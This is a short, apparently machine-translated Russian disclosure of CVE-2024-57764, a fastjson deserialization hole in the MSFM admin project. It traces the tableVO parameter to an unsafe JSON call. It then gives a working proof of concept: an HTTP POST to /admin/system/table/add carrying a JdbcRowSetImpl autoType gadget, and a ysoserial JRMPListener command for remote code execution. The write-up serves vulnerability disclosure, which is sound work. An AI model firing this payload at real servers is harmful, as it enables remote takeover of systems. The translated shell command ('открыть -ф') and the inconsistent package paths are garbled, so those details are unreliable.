CVE-2024-57764
Обнаружено лабораторией безопасности Chaitin Security Research Lab

Продукт с уязвимостью: wangl1989/MSFM
Версия продукта с уязвимостью: до 2025.01.01
Тип уязвимости: десериализация данных в fastjson
Детали уязвимости:

1. Глобальный поиск объекта JSONObject. toJSONString показывает, что путь com/mysiteforme/admin/service/ipl/TableServiceImpl.java: 95 принимает параметр tableVO и преобразует его в строку в формате JSON. Дальнейший анализ показывает, что эта операция выполняется в методе createTable(). Продолжаем отслеживать вызов этого метода.
   
   
2. Путь контроллерного уровня com/mysiteform/admin/controller/system/TableController.java: 113 вызывает метод createTable() и передает значение параметра tableVO. Продолжая анализ, было установлено, что параметр был передан из пути запроса /add в пути com/mysiteform/admin/controller/system/TableController.java: 93, а весь процесс не фильтровал и не экранировал параметр tableVO. Поэтому параметр tableVO управляемый, и здесь есть уязвимость десериализации данных в fastjson.
   
3. Создание POC, вход в систему для захвата пакетов и замены cookies.

http://127.0.0.1:8083
Аккаунт: test/1

POST /admin/system/table/add HTTP/1.1
Host: 127.0.0.1:8083
Content-Type: application/json
Cookie: XXXXX

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/a","autoCommit":true}}

java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 1099 CommonsBeanutils1 "открыть -ф /System/Applications/Калькулятор.app"

![введите описание изображения здесь](https://foruda.gitee.com/images/1736133838641821010/c03f507b_13737655.png "Screen Shot")